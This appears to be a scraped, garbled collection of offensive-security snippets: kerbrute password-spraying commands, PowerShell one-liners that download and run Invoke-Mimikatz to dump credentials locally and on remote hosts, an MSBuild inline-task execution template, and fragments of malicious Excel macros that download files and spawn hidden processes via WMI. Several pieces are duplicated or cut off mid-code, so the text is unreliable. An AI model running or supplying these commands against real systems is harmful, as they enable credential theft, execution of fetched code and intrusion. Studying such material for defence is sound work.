With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
Recording of talk from CERN | |
https://indico.cern.ch/event/622483/ (click the recording button) | |
Past talks: | |
http://www.slideshare.net/KenJohnson61/aws-surival-guide |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Invoke-Mimikatz | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] |
function Compress-Data | |
{ | |
<# | |
.Synopsis | |
Compresses data | |
.Description | |
Compresses data into a GZipStream | |
.Link | |
Expand-Data | |
.Link |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- Pass xml to msbuild for compile and execution --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild filepath\filename.xlm --> | |
<!-- Configure AssemblyFile and pok for that to work --> | |
<Target Name="34rfas"> | |
<QWEridxnaPO /> | |
</Target> | |
<UsingTask | |
TaskName="QWEridxnaPO" | |
TaskFactory="CodeTaskFactory" |
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc | |
//posted by @JohnLaTwC | |
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html | |
----------------------------------------------- macro ---------------------------------- | |
Private Sub Workbook_Open() | |
Call doom_Init | |
Call doom_ShowHideSheets | |
End Sub |
'get OS, if nt else if OS X | |
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long | |
' A Base64 Encoder/Decoder. | |
' | |
' This module is used to encode and decode data in Base64 format as described in RFC 1521. | |
' | |
' Home page: www.source-code.biz. | |
' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html). | |
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland. |
Function CSV_Import(strFile) | |
Dim ws As Worksheet | |
Set ws = ActiveWorkbook.Sheets("Sheet1") | |
With ws.QueryTables.Add(Connection:="TEXT;" & strFile, Destination:=ws.Range("A1")) | |
.TextFileParseType = xlDelimited | |
.TextFileCommaDelimiter = True | |
.Refresh | |
End With | |
ActiveWorkbook.Saved = True | |
End Function |
Sub DownloadAndExec() | |
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") | |
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") | |
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False | |
xHttp.Send | |
With bStrm | |
.Type = 1 '//binary | |
.Open |
Sub InkEdit1_GotFocus() | |
Debugging | |
End Sub | |
Public Function Debugging() As Variant | |
Const HIDDEN_WINDOW = 0 | |
strComputer = "." | |
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") | |
Set objStartup = objWMIService.Get("Win32_ProcessStartup") | |
Set objConfig = objStartup.SpawnInstance_ |